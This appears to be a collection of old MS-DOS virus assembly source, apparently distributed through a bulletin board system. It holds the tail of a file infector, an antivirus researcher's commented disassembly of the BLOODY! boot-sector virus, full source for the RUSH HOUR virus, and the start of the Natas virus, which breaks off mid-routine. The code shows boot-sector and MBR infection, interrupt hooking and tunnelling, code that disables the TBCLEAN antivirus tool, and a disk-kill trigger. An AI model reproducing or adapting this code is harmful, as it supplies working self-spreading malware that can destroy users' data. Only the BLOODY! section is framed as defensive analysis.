	      push   bx
	      call   word ptr cs:[table]	 ; decode virus
	      pop    bx
	      popf
	      jnc    mod_8_cont1
	      pop    ax
	      mov    ax,word ptr cs:[table+0e]
	      add    ax,offset mod_8_ext - offset mod_8
	      push   ax
	      ret
mod_8_cont1:
	      mov    ax,es:[di+11]		 ; fp:=end of file
	      mov    word ptr es:[di+15],ax	 ;

	      mov    dx,offset myend+1
	      mov    cx,bp			 ; bp - files read
	      mov    ah,40			 ;
	      pushf				 ;
	      call   cs:stdint21		 ; write in end of file

	      ret

mod_8_cont_end:
	      mov    ax,5701	 ;
	      mov    cx,cs:ftime ;
	      mov    dx,cs:fdate ; restore file date/time
	      pushf		 ;
	      call   cs:oldint21 ;

	      inc    cs:files
	      cmp    cs:files,0a
	      jne    mod_8_ext
	      call   word ptr cs:[table+8]
	      jmp    short mod_8_ext
mod_8_exit:
	      stc
	      jmp    short mod_8_ex
mod_8_ext:
	      clc
mod_8_ex:
	      pop    bp
	      pop    di
	      pop    es
	      pop    ds
	      pop    dx
	      pop    cx
	      ret

;---------------------------------------------------------------

myend	      db   0

	      int    20 	       ;code of infected file

false_mod_1:
	      mov     word ptr cs:[table],offset mod_1
	      ret

code	      ends
	      end  start

.............................................................................



; 	BLOODY! virus
;
;	Discovered an commented by  Ferenc Leitold
; 			      Hungarian VirusBuster Team
;                              Address: 1399 Budapest
;                                       P.O. box 701/349
;                                          HUNGARY


217D:0100  2EFF2E177C     JMP    Far CS:[7C17]
217D:0105  E9B500         JMP    01BD		; Jump to main entry point

217D:0108  00        	  db	 0		; Counter
217D:0109  00        	  db	 0
217D:010A  00             db	 0		; Flag:
						;      00 : floppy
						;      80 : hard disk
217D:010B  00             db	 0

217D:010C  A100F0         MOV    AX,[F000]

217D:010F  0301809F       DW	 0103H,9F80H	; Entry point at TOP

217D:0113  007C0000	  DW	 7C00H,0000H	; Address of orig. boot

217D:0117  057C0000       DW	 7C05H,0000H

217D:011B  00000000	  DW	 0000H,0000H	; original INT13 vector

;************************ INT13 entry point *****************************

217D:011F  80FC02         CMP    AH,02        	; Check parameters
217D:0122  720D           JC     0131
217D:0124  80FC04         CMP    AH,04
217D:0127  7308           JNC    0131
217D:0129  80FA80         CMP    DL,80
217D:012C  7303           JNC    0131
217D:012E  E80500         CALL   0136           ; Call, if AH=2,3 & DL!=80
217D:0131  2EFF2E0B00     JMP    Far CS:[000B]	; Jump to original INT13

217D:0136  50             PUSH   AX		; Save registers
217D:0137  53             PUSH   BX
217D:0138  51             PUSH   CX
217D:0139  52             PUSH   DX
217D:013A  06             PUSH   ES
217D:013B  1E             PUSH   DS
217D:013C  56             PUSH   SI
217D:013D  57             PUSH   DI

217D:013E  0E             PUSH   CS		; Set DS,ES to CS
217D:013F  1F             POP    DS
217D:0140  0E             PUSH   CS
217D:0141  07             POP    ES

217D:0142  BE0200         MOV    SI,0002	; 2 probe

217D:0145  33C0           XOR    AX,AX		; Reset drive
217D:0147  9C             PUSHF
217D:0148  FF1E0B00       CALL   Far [000B]	; Call INT13
217D:014C  B80102         MOV    AX,0201	; Read boot sector of floppy
217D:014F  BB0002         MOV    BX,0200
217D:0152  B90100         MOV    CX,0001
217D:0155  32F6           XOR    DH,DH
217D:0157  9C             PUSHF
217D:0158  FF1E0B00       CALL   Far [000B]	; Call INT13
217D:015C  7305           JNC    0163
217D:015E  4E             DEC    SI		; If error next probe
217D:015F  75E4           JNZ    0145
217D:0161  EB2E           JMP    0191		; Jump, if 2 bad probes was

217D:0163  33F6           XOR    SI,SI  	; Check boot sector, if
217D:0165  BF0002         MOV    DI,0200	;  if infected yet
217D:0168  B90300         MOV    CX,0003
217D:016B  FC             CLD
217D:016C  F3A7           REP    CMPSW
217D:016E  7421           JZ     0191		; Jump, if already infected

217D:0170  B80103         MOV    AX,0301	; Write orig. boot sector
217D:0173  BB0002         MOV    BX,0200
217D:0176  B90300         MOV    CX,0003	; cyl: 0  sect: 3
217D:0179  B601           MOV    DH,01		; head: 1
217D:017B  9C             PUSHF
217D:017C  FF1E0B00       CALL   Far [000B]	; Call INT13
217D:0180  720F           JC     0191

217D:0182  B80103         MOV    AX,0301	; Write infected boot sector
217D:0185  33DB           XOR    BX,BX
217D:0187  B90100         MOV    CX,0001	; cyl:0 sect:1
217D:018A  32F6           XOR    DH,DH		; head: 0
217D:018C  9C             PUSHF
217D:018D  FF1E0B00       CALL   Far [000B]

217D:0191  5F             POP    DI		; Restore registers
217D:0192  5E             POP    SI
217D:0193  1F             POP    DS
217D:0194  07             POP    ES
217D:0195  5A             POP    DX
217D:0196  59             POP    CX
217D:0197  5B             POP    BX
217D:0198  58             POP    AX
217D:0199  C3             RET

217D:019A  1D1D1D1A3737         ; Coded text:
217D:01A0  37373737557B  	; "\r\r\r\n      Bloody! Jun. 4, 1989\r\r\r\n"
217D:01A6  7878736E3637
217D:01AC  5D6279393723
217D:01B2  3B37262E2F2E
217D:01B8  1D1D1D1A00

;************************** Main entry point *******************************

217D:01BD  33C0           XOR    AX,AX
217D:01BF  8ED8           MOV    DS,AX
217D:01C1  FA             CLI
217D:01C2  8ED0           MOV    SS,AX
217D:01C4  BC007C         MOV    SP,7C00
217D:01C7  FB             STI

217D:01C8  A14C00         MOV    AX,[004C]	; Save orig. INT13 vector
217D:01CB  A30B7C         MOV    [7C0B],AX
217D:01CE  A14E00         MOV    AX,[004E]
217D:01D1  A30D7C         MOV    [7C0D],AX

217D:01D4  A11304         MOV    AX,[0413]	; Decrease memory by 2KB
217D:01D7  48             DEC    AX
217D:01D8  48             DEC    AX
217D:01D9  A31304         MOV    [0413],AX

217D:01DC  B106           MOV    CL,06		; Calculate segment
217D:01DE  D3E0           SHL    AX,CL
217D:01E0  A3117C         MOV    [7C11],AX



217D:01E3  A34E00         MOV    [004E],AX	; Set new INT13 vector
217D:01E6  8EC0           MOV    ES,AX
217D:01E8  B81F00         MOV    AX,001F
217D:01EB  A34C00         MOV    [004C],AX

217D:01EE  C7060F7C0301   MOV    [7C0F],0103	; Set JMP argument points
						;  to TOP

217D:01F4  BE007C         MOV    SI,7C00	; Copy itself to TOP
217D:01F7  33FF           XOR    DI,DI
217D:01F9  B90001         MOV    CX,0100
217D:01FC  FC             CLD
217D:01FD  F3A5           REP    MOVSW
217D:01FF  FF2E0F7C       JMP    Far [7C0F]	; Jmp to TOP

TOP :0203  33C0           XOR    AX,AX		; Reset drive
TOP :0205  CD13           INT    13

TOP :0207  0E             PUSH   CS       	; Set registers to load
TOP :0208  1F             POP    DS		;  original sector
TOP :0209  33C0           XOR    AX,AX
TOP :020B  8EC0           MOV    ES,AX
TOP :020D  B80102         MOV    AX,0201
TOP :0210  BB007C         MOV    BX,7C00
TOP :0213  803E0A0000     CMP    [000A],00	; Check, if it is floppy ?
TOP :0218  7435           JZ     024F		; Jump, if floppy

						; if hard disk, load
						;  orig. part. table
TOP :021A  B90600         MOV    CX,0006	; cyl.: 0 sect.: 6
TOP :021D  BA8000         MOV    DX,0080	; head: 0
TOP :0220  CD13           INT    13
TOP :0222  0E             PUSH   CS
TOP :0223  07             POP    ES
TOP :0224  FE060800       INC    B/[0008]	; Increase counter
TOP :0228  803E080080     CMP    [0008],80
TOP :022D  721E           JC     024D		; If counter < 128 -> no text
TOP :022F  C60608007A     MOV    [0008],7A
TOP :0234  FC             CLD

TOP :0235  BE9A00         MOV    SI,009A	; Write coded text via BIOS
TOP :0238  AC             LODSB
TOP :0239  3C00           CMP    AL,00
TOP :023B  740C           JZ     0249
TOP :023D  32060300       XOR    AL,[0003]
TOP :0241  B40E           MOV    AH,0E
TOP :0243  B700           MOV    BH,00
TOP :0245  CD10           INT    10
TOP :0247  EBEF           JMP    0238

TOP :0249  B400           MOV    AH,00		; Wait for keystroke
TOP :024B  CD16           INT    16
TOP :024D  EB54           JMP    02A3

						; if floppy
TOP :024F  B90300         MOV    CX,0003	; read orig. boot sector
TOP :0252  BA0001         MOV    DX,0100	; cyl: 0 hd: 1 sect: 3
TOP :0255  CD13           INT    13

TOP :0257  0E             PUSH   CS
TOP :0258  07             POP    ES
TOP :0259  721D           JC     0278		; Jump, if error occured


TOP :025B  B80102         MOV    AX,0201	; Load part. table of
TOP :025E  BB0002         MOV    BX,0200	;  1st hard disk
TOP :0261  B90100         MOV    CX,0001
TOP :0264  BA8000         MOV    DX,0080
TOP :0267  CD13           INT    13
TOP :0269  720D           JC     0278		; Jump, if error occured

TOP :026B  BE0002         MOV    SI,0200	; Check 1st 3 word
TOP :026E  33FF           XOR    DI,DI
TOP :0270  B90300         MOV    CX,0003
TOP :0273  FC             CLD
TOP :0274  F3A7           REP    CMPSW
TOP :0276  750E           JNZ    0286

						; If infected yet
TOP :0278  C6060A0000     MOV    [000A],00 	; Set Flag to 0
TOP :027D  C606080000     MOV    [0008],00	; Reset counter
TOP :0282  FF2E1300       JMP    Far [0013]	; Jump to orig. boot

TOP :0286  B80103         MOV    AX,0301	; Write orig. part. table
TOP :0289  BB0002         MOV    BX,0200
TOP :028C  B90600         MOV    CX,0006        ; cyl: 0 sect: 6 hd: 0
TOP :028F  CD13           INT    13
TOP :0291  72E5           JC     0278

TOP :0293  BEBE03         MOV    SI,03BE	; Copy partition info
TOP :0296  BFBE01         MOV    DI,01BE	;  after virus body
TOP :0299  B92101         MOV    CX,0121
TOP :029C  F3A5           REP    MOVSW
TOP :029E  C6060A0001     MOV    [000A],01

TOP :02A3  B80103         MOV    AX,0301	; Write boot sector or
						;  partition table with
						;  increased counter
TOP :02A6  33DB           XOR    BX,BX
TOP :02A8  B90100         MOV    CX,0001
TOP :02AB  CD13           INT    13


TOP :02AD  BEBE04         MOV    SI,04BE	; Clear area of partition
TOP :02B0  BFBE01         MOV    DI,01BE	;  info
TOP :02B3  B92000         MOV    CX,0020
TOP :02B6  F3A5           REP    MOVSW
TOP :02B8  EBBE           JMP    0278		; Set parameters &
						;  jump to orig. boot
TOP :02BA  DE07           ESC    30,[BX]
TOP :02BC  DF07           ESC    38,[BX]
TOP :02BE  0000           ADD    [BX+SI],AL
TOP :02C0  0000           ADD    [BX+SI],AL
TOP :02C2  0000           ADD    [BX+SI],AL
TOP :02C4  0000           ADD    [BX+SI],AL
TOP :02C6  0000           ADD    [BX+SI],AL
TOP :02C8  0000           ADD    [BX+SI],AL
TOP :02CA  0000           ADD    [BX+SI],AL
TOP :02CC  0000           ADD    [BX+SI],AL
TOP :02CE  0000           ADD    [BX+SI],AL
TOP :02D0  0000           ADD    [BX+SI],AL
TOP :02D2  0000           ADD    [BX+SI],AL
TOP :02D4  0000           ADD    [BX+SI],AL
TOP :02D6  0000           ADD    [BX+SI],AL
TOP :02D8  0000           ADD    [BX+SI],AL
TOP :02DA  0000           ADD    [BX+SI],AL
TOP :02DC  0000           ADD    [BX+SI],AL
TOP :02DE  0000           ADD    [BX+SI],AL
TOP :02E0  0000           ADD    [BX+SI],AL
TOP :02E2  0000           ADD    [BX+SI],AL
TOP :02E4  0000           ADD    [BX+SI],AL
TOP :02E6  0000           ADD    [BX+SI],AL
TOP :02E8  0000           ADD    [BX+SI],AL
TOP :02EA  0000           ADD    [BX+SI],AL
TOP :02EC  0000           ADD    [BX+SI],AL
TOP :02EE  0000           ADD    [BX+SI],AL
TOP :02F0  0000           ADD    [BX+SI],AL
TOP :02F2  0000           ADD    [BX+SI],AL
TOP :02F4  0000           ADD    [BX+SI],AL
TOP :02F6  0000           ADD    [BX+SI],AL
TOP :02F8  0000           ADD    [BX+SI],AL
TOP :02FA  0000           ADD    [BX+SI],AL
TOP :02FC  0000           ADD    [BX+SI],AL
TOP :02FE  55             PUSH   BP
TOP :02FF  AA             STOSB
.............................................................................


;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;
page  72,132
                title   Virus"RUSH HOUR"        (c) Hanx ,1992
                name    VIRUS

abso            segment at 0
                org     4*10h
video_int       dw      2 dup (?)
                org     4*21h
dos_int         dw      2 dup (?)
                org     4*24h
error_int       dw      2 dup (?)
abso            ends

code            segment
                assume  cs:code, ds:code, es:code

                org     05ch
fcb             label   byte
drive           db      ?
fspec           db      11 dup (' ')
                org     6ch
fsize           dw      2 dup (?)
fdate           dw      ?
ftime           dw      ?
                org     80h
dta             dw      128 dup (?)

                org     071eh
                xor     ax,ax
                mov     es,ax
                assume  es:abso
                push    cs
                pop     ds
                mov     ax,video_int
                mov     bx,video_int+2
                mov     word ptr video_vector,ax
                mov     word ptr video_vector+2,bx
                mov     ax,dos_int
                mov     bx,dos_int+2
                mov     word ptr dos_vector,ax
                mov     word ptr dos_vector+2,bx
                cli
                mov     dos_int,offset virus
                mov     dos_int+2,cs
                mov     video_int,offset disease
                mov     video_int+2,cs
                sti
                mov     ah,0
                int     1ah
                mov     time_0,dx
                lea     dx,virus_einde
                int     27h
video_vector    dd      (?)
dos_vector      dd      (?)
error_vector    dw      2 dup (?)
time_0          dw      ?

rndval          db      'bfhg'
active          db      0
preset          db      0
                db      'A:'
fname           db      'KEYBGR  COM'
                db      0

virus           proc    far
                assume  cs:code, ds:nothing, es:nothing
                push    ax
                push    cx
                push    dx
                mov     ah,0
                INT     1AH
                SUB     DX,TIME_0
                CMP     DX,16384
                JL      $3
                MOV     ACTIVE,1
$3:             pop     dx
                pop     cx
                pop     ax
                cmp     ax,4b00h
                je      $1
exit_1:         jmp     dos_vector
$1:             push    es
                push    bx
                push    ds
                push    dx
                mov     di,dx
                mov     drive,0
                mov     al,ds:[di+1]
                cmp     al,':'
                jne     $5
                mov     al,ds:[di]
                sub     al,'A'-1
                mov     drive,al
$5:             cld
                push    cs
                pop     ds
                xor     ax,ax
                mov     es,ax

                assume  ds:code, es:abso

                mov     ax,error_int
                mov     bx,error_int+2
                mov     error_vector,ax
                mov     error_vector+2,bx
                mov     error_int,offset error
                mov     error_int+2,cs
                push    cs
                pop     es

                assume  es:code

                lea     dx,dta
                mov     ah,1ah
                int     21h
                mov     bx,11
$2:             mov     al,fname-1[bx]
                mov     fspec-1[bx],al
                dec     bx
                jnz     $2
                lea     dx,fcb
                mov     ah,0fh
                int     21h
                cmp     al,0
                jne     exit_0
                mov     byte ptr fcb+20h,0
                mov     ax,ftime
                cmp     ax,4800h
                je      exit_0
                mov     preset,1
                mov     si,100h
$4:             lea     di,dta
                mov     cx,128
                rep     movsb
                lea     dx,fcb
                mov     ah,15h
                int     21h
                cmp     si,offset virus_einde
                jl      $4
                mov     fsize,offset virus_einde -100h
                mov     fsize+2,0
                mov     fdate,0AA3h
                mov     ftime,4800h
                lea     dx,fcb
                mov     ah,10h
                int     21h
                xor     ax,ax
                mov     es,ax
                assume  es:abso
                mov     ax,error_vector
                mov     bx,error_vector+2
                mov     error_int,ax
                mov     error_int+2,bx

exit_0:         pop     dx
                pop     ds
                pop     bx
                pop     es
                assume  ds:nothing, es:nothing
                mov     ax,4b00h
                jmp     dos_vector
virus   endp
error   proc    far
                iret
error   endp
disease proc    far
                assume ds:nothing, es:nothing
                push    ax
                push    cx
                test    preset,1
                jz      exit_2
                test    active,1
                jz      exit_2
                in      al,61h
                and     al,0feh
                out     61h,al
                mov     cx,3
noise:          mov     al,rndval
                xor     al,rndval+3
                shl     al,1
                shl     al,1
                rcl     word ptr rndval,1
                rcl     word ptr rndval+2,1
                mov     ah,rndval
                and     ah,2
                in      al,61h
                and     al,0fdh
                or      al,ah
                out     61h,al
                loop    noise
                and     al,0fch
                or      al,1
                out     61h,al
exit_2:         pop     cx
                pop     ax
                jmp     video_vector
disease         endp

                db      'Dit is een demonstratie van een zogenaamd computervirus.'
                db      'Het heeft volledige controle over alle systeem-componenten'
                db      'en alle harde schijven en in de drive(s) ingevoerde'
                db      'diskettes. Het programma kopieert zichzelf naar andere,'
                db      'nog niet besmette besturingssystemen en verspreidt zich op'
                db      'die manier ongecontroleerd. In dit geval zijn er geen'
                db      'programma`s beschadigd of schijven gewist, omdat dit'
                db      'slechts een demonstratie is. Een kwaadaardig virus'
                db      'had echter wel degelijk schade aan kunnen richten.'

                org     1c2ah
virus_einde     label   byte
code    ends
end


;;
;> and Remember Don't Forget to Call <;
;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <;
;;

.............................................................................


;Natas Virus
;COM/EXE/Boot sector/partition table/full Stealth and polymorphic
;Tunnels
;Does other stuff
;2 files -- v1eng.asm = virus  eng.asm = Engine


----------------<<v1eng.asm>>--------------------------------------------------

.model  tiny
.code

file_size       equ     file_end - v_start
sect_size       equ     (decrypt - v_start + 511) / 512
para_size       equ     (v_end - v_start + 15) / 16
kilo_size       equ     (v_end - v_start + 1023) / 1024

find_dos_13     equ     tracer_dos_13 - (trace_mode + 1)
find_13         equ     tracer_13 - (trace_mode + 1)
find_15         equ     tracer_15 - (trace_mode + 1)
find_21         equ     tracer_21 - (trace_mode + 1)
find_40         equ     tracer_40 - (trace_mode + 1)
step_21         equ     tracer_step_21 - (trace_mode + 1)

loader_size     equ     loader_end - loader

no_hook_21      equ     new_13_next - (hook_21 + 1)
yes_hook_21     equ     check_21 - (hook_21 + 1)

boot            equ     0
file            equ     1

years           equ     100 shl 1


v_start:        jmp     decrypt
                
                ; push    cs
                ; pop     ds
                ; call    copy_ints
                dw      copy_ints - ($ + 2)     ; save ints 13 15 21 40
                mov     ds:hook_21,al           ; (0=yes_hook_21) hook 21h
                mov     ds:origin,al            ; (0=boot) remeber host
                mov     es,ax                   ; ES=0
                pop     di
                sub     di,3                    ; address of loader in boot
                push    ax di                   ; save return address 0:xxxx
                mov     si,offset boot_code
                call    move_boot_code1         ; copy and decode boot code
                mov     al,13h
                mov     dx,offset new_13
                call    set_int                 ; hook int 13h
                call    inf_hard                ; infect drive C:
                test    byte ptr ds:load_head,dl ; DL=80h drive C:?
                je      boot_retf
                mov     ax,1ffh
                call    random                  ; time to activate?
                jne     boot_retf
                jmp     kill_disk

boot_retf:      retf                            ; return to boot sector
                
;=====( Copy boot code and (en/de)crypt it )=================================;

move_boot_code1:mov     ah,ds:[si - 1]          ; get key
move_boot_code: mov     cx,loader_size
                cld
move_boot_loop: lodsb
                xor     al,ah                   ; code/decode
                rol     ah,1
                stosb
                loop    move_boot_loop
                retn
                
;=====( Code that was in boot sector before infection )======================;

boot_code_key   db      ?
boot_code:      db      loader_size dup(?)

;=====( Gets inserted into infected Boot sectors/MBRs )======================;

loader:         call    $ + 3
                mov     di,40h
                mov     ds,di
                sub     word ptr ds:[di-(40h-13h)],kilo_size ; hide memory
                mov     ax,ds:[di-(40h-13h)]
                mov     cl,0ah
                ror     ax,cl                   ; get TOM address
                mov     es,ax
                mov     ax,200h + sect_size
                xor     bx,bx
                mov     cx,0
load_sect       =       $ - 2
                mov     dx,0
load_head       =       $ - 2
                int     13h                     ; read code into memory
                jb      load_fail
                push    es bx                   ; address of high code
                retf
load_fail:      int     18h
loader_end:

;=====( save ints 13h, 15h, 21h & 40h. Assumes ES=CS )=======================;

copy_ints:      push    ds
                xor     ax,ax
                mov     ds,ax                   ; segment 0
                mov     si,13h * 4h
                mov     di,offset int_13
                push    si si
                movsw
                movsw                           ; int 13h to int_13
                pop     si
                movsw
                movsw                           ; int 13h to dos_13
                mov     si,15h * 4h
                movsw
                movsw                           ; int 15h to int_15
                pop     si                      ; address of int 13h's IVT
                cmp     byte ptr ds:[475h],al   ; any hard disks?
                je      copy_int_40
                mov     si,40h * 4h
copy_int_40:    movsw
                movsw                           ; copy int 13h/40h to int_40
                mov     si,21h * 4h
                movsw
                movsw                           ; int 21h to int_21
                pop     ds
                retn

;=====( get interrupt address )==============================================;

get_int:        push    ax
                xor     ah,ah
                rol     ax,1
                rol     ax,1
                xchg    bx,ax
                xor     ax,ax
                mov     es,ax
                les     bx,es:[bx]              ; get int address
                pop     ax
                retn

;=====( Set interrupt address )==============================================;

set_int:        push    ax bx ds
                xor     ah,ah
                rol     ax,1
                rol     ax,1
                xchg    ax,bx
                xor     ax,ax
                push    ds
                mov     ds,ax
                mov     ds:[bx],dx
                pop     ds:[bx + 2]
                pop     ds bx ax
                retn
                

push_all:       pop     cs:push_pop_ret
                pushf
                push    ax bx cx dx bp si di ds es
                mov     bp,sp
push_pop_jmp:   jmp     cs:push_pop_ret

pop_all:        pop     cs:push_pop_ret
                pop     es ds di si bp dx cx bx ax
                popf
                jmp     push_pop_jmp

;=====( Infect Drive C: )====================================================;

inf_hard:       push    cs cs
                pop     es ds
                mov     ax,201h
                mov     bx,offset disk_buff
                mov     cx,1
                mov     dx,80h
                call    call_13                 ; read MBR of drive C:
                jb      cant_inf_hard
                cmp     ds:[bx.pt_start_head],ch ; Jackal?
                je      cant_inf_hard
                mov     cx,ds:[bx.pt_end_sector_track]
                and     cx,0000000000111111b    ; get sector count
                sub     cx,sect_size
                jbe     cant_inf_hard
                cmp     cl,1                    ; too few sectors?
                jbe     cant_inf_hard
                call    copy_loader             ; copy loader into MBR
                jb      cant_inf_hard
                push    bx
                mov     ax,300h + sect_size
                xor     bx,bx
                call    call_13                 ; write code to hidden sectors
                pop     bx
                jb      cant_inf_hard
                mov     ax,301h
                mov     cl,1
                call    call_13                 ; write infected MBR
cant_inf_hard:  retn   

;=====( Copy Loader into disk_buff (BX) )====================================;

copy_loader:    push    cx dx
                cmp     word ptr ds:[bx+1feh],0aa55h    ; valid boot code?
                jne     copy_load_no
                mov     di,offset boot_code
                mov     ds:[di+load_sect-boot_code],cx  ; save track/sector
                and     dl,80h                          ; Drive C: or A:
                mov     ds:[di+load_head-boot_code],dx  ; save head/disk
                call    find_boot               ; find code/already infected?
                je      copy_load_no
                call    random_1                ; get random key
                mov     ds:[di - 1],ah          ; save key at boot_code_key
                push    si
                call    move_boot_code          ; save boot code and encrypt
                mov     si,di                   ; offset of loader
                pop     di                      ; boot code pointer
                mov     cx,loader_size
                rep     movsb                   ; copy loader into boot sect
                clc
                mov     al,0
                org     $ - 1
copy_load_no:   stc
                pop     dx cx
                retn   
                
;=====( Find start of boot sector's code )===================================;

find_boot:      mov     si,bx
                cld
                lodsb                           ; get 1st instruction
                push    ax
                lodsw                           ; Jump displacement (if jump)
                xchg    cx,ax
                pop     ax
                cmp     al,0ebh                 ; Short jump?
                jne     find_boot_jump
                xor     ch,ch                   ; 8bit jump
                dec     si
                jmp     find_boot_add
find_boot_jump: cmp     al,0e9h                 ; Near Jump?
                je      find_boot_add
find_boot_noadd:xor     cx,cx                   ; No displacement
                mov     si,bx
find_boot_add:  add     si,cx                   ; si=start of boot code
                cmp     si,offset (disk_buff+200h) - (loader_size + 5) 
                                                ; jump out of range?
                jnb     find_boot_noadd
                cmp     word ptr ds:[si],00e8h  ; CALL -> already infected
                jne     find_boot_ret
                cmp     word ptr ds:[si+2],0bf00h ; 00 MOV DI -> already inf
find_boot_ret:  retn

;=====( Disable TBCLEAN )====================================================;

anti_tbclean:   xor     ax,ax
                pushf
                pop     dx
                and     dh,not 1                ; TF off
                push    dx dx
                popf
                push    ss
                pop     ss
                pushf                           ; Not trapped
                pop     dx
                test    dh,1                    ; TF set?
                pop     dx
                je      anti_tb_ret
                push    es
                xor     bp,bp
                mov     cx,ss
                cli
                mov     ss,bp                   ; segment 0
                les     di,ss:[bp+1h*4h]        ; address of int 1h
                mov     ss,cx
                sti
                mov     al,0cfh
                cld
                stosb                           ; IRET -> Int 1h
                pop     es
                push    dx
                popf
anti_tb_ret:    xchg    bp,ax                   ; save result
                retn

;=====( Swap jump into DOS' int 13h )========================================;

swap_13:        call    push_all
                mov     si,offset jump_code_13
                les     di,cs:[si+dos_13-jump_code_13]  ; get address in DOS
                jmp     swap_code

;=====( Swap jump into DOS' int 21h )========================================;

swap_21:        call    push_all
                mov     si,offset jump_code_21
                les     di,cs:[si+int_21-jump_code_21]
swap_code:      push    cs
                pop     ds
                mov     cx,5
                cmp     ds:origin,ch            ; 0 -> Boot origin, no tunnel
                je      swap_end
                cld
swap_loop:      lodsb
                xchg    al,es:[di]
                mov     ds:[si-1],al
                inc     di
                loop    swap_loop
swap_end:       call    pop_all
                retn

;=====( Find original interrupt entry points )===============================;

find_ints:      call    copy_ints               ; get interrupt addresses
                mov     ah,52h
                int     21h
                mov     ax,es:[bx-2]
                mov     ds:dos_seg,ax           ; 1st MCB segment
                mov     al,1h
                call    get_int                 ; get address of int 1h
                push    bx es
                mov     dx,offset tracer
                call    set_int                 ; hook int 1h
                pushf
                pop     si
                mov     di,offset trace_mode
                mov     byte ptr ds:[di],find_dos_13  ; find int 13h in DOS
                                                      ; and BIOS
                mov     ah,1h
                call    si_tf                   ; set TF
                call    call_13
                mov     byte ptr ds:[di],find_15 ; find int 15h in BIOS
                mov     ah,0c0h
                call    si_tf                   ; set TF
                pushf
                call    ds:int_15   
                mov     byte ptr ds:[di],find_21 ; find int 21h in DOS
                mov     ah,30h
                call    si_tf                   ; set TF
                call    call_21
                mov     byte ptr ds:[di],find_40 ; find int 40h in BIOS
                mov     ah,1
                call    si_tf                   ; set TF
                call    call_40
                and     si,not 100h
                push    si
                popf                            ; disable Trapping
                pop     ds dx
                mov     al,1
                call    set_int                 ; unhook int 1h
                retn

;=====( Set TF in SI, then set flags to SI )=================================;

si_tf:          or      si,100h
                push    si
                popf
                retn

;=====( Tracing/Tunneling )==================================================;

tracer:         push    ds
                push    cs
                pop     ds
                mov     ds:old_di,di
                mov     di,offset old_ax
                mov     ds:[di],ax
                mov     ds:[di+old_bx-old_ax],bx
                mov     ds:[di+old_cx-old_ax],cx
                mov     ds:[di+old_dx-old_ax],dx
                pop     ds:[di-(old_ax-old_ds)]
                pop     bx cx dx                ; get IP, CS and Flags
                mov     ax,cs
                cmp     ax,cx                   ; In our CS?
                jne     $
trace_mode      =       byte ptr $ - 1
                jmp     tracer_iret

tracer_dos_13:  cmp     cx,ds:dos_seg           ; in DOS code?
                jnb     tracer_cont
                mov     di,offset dos_13
                mov     ds:trace_mode,find_13   ; find it in BIOS next
                jmp     tracer_save_f

tracer_21:      cmp     cx,1234h                ; In DOS code?
dos_seg         =       word ptr $ - 2
                jnb     tracer_cont
                mov     di,offset int_21
tracer_save:    and     dh,not 1                ; TF off
tracer_save_f:  mov     ds:[di],bx
                mov     ds:[di + 2],cx          ; save address of int
                jmp     tracer_cont

tracer_15:      mov     di,offset int_15
                jmp     tracer_bios

tracer_40:      mov     di,offset int_40
                jmp     tracer_bios
                
tracer_13:      mov     di,offset int_13
tracer_bios:    cmp     ch,0c8h                 ; Below BIOS?
                jb      tracer_cont
                cmp     ch,0f4h                 ; Above BIOS?
                jb      tracer_save
                jmp     tracer_cont

tracer_step_21: dec     ds:inst_count           ; down counter
                jne     tracer_cont
                push    dx
                mov     al,1
                lds     dx,ds:int_1             ; get int 1h address
                call    set_int
                call    swap_21                 ; insert int 21h jump
                pop     dx
                and     dh,not 1h               ; TF off

tracer_cont:    test    dh,1                    ; TF on?
                je      tracer_iret
get_inst:       mov     ds,cx                   ; instruction CS
                xor     di,di
get_inst1:      mov     ax,ds:[bx + di]         ; get instruction
                cmp     al,0f0h                 ; LOCK
                je      skip_prefix
                cmp     al,0f2h                 ; REPNE
                je      skip_prefix
                cmp     al,0f3h                 ; REPE?
                je      skip_prefix
                cmp     al,9ch                  ; PUSHF or above?
                jae     emulate_pushf
                and     al,11100111b            ; 26,2e,36,3e = 26
                cmp     al,26h                  ; Segment Prefix?
                jne     tracer_iret
skip_prefix:    inc     di
                jmp     get_inst1

emulate_pushf:  jne     emulate_popf
                and     dh,not 1                ; TF off
                push    dx                      ; fake PUSHF
emulate_next:   lea     bx,ds:[bx + di + 1]     ; skip instruction
emulate_tf:     or      dh,1                    ; TF on
                jmp     get_inst

emulate_popf:   cmp     al,9dh                  ; POPF?
                jne     emulate_iret
                pop     dx                      ; fake POPF
                jmp     emulate_next

emulate_iret:   cmp     al,0cfh                 ; IRET?
                jne     emulate_int
                pop     bx cx dx                ; fake IRET
                jmp     emulate_tf

emulate_int:    cmp     al,0cdh                 ; Int xx
                je      emulate_int_xx
                cmp     al,0cch                 ; Int 3?
                mov     ah,3
                je      emulate_int_x
                cmp     al,0ceh                 ; Into?
                mov     ah,4
                jne     tracer_iret
                test    dh,8                    ; OF set?
                je      tracer_iret
emulate_int_x:  dec     bx                      ; [bx+di+2-1]
emulate_int_xx: and     dh,not 1                ; TF off
                lea     bx,ds:[bx + di + 2]     ; get return address
                push    dx cx bx                ; fake Int
                mov     al,ah                
                push    es
                call    get_int                 ; get interrupt address
                mov     cx,es
                pop     es
                jmp     emulate_tf

tracer_iret:    push    dx cx bx                ; save flags, cs & ip
                mov     ax,0
old_ds          =       word ptr $ - 2
                mov     ds,ax
                mov     ax,0
old_ax          =       word ptr $ - 2
                mov     bx,0
old_bx          =       word ptr $ - 2
                mov     cx,0
old_cx          =       word ptr $ - 2
                mov     dx,0
old_dx          =       word ptr $ - 2
                mov     di,0
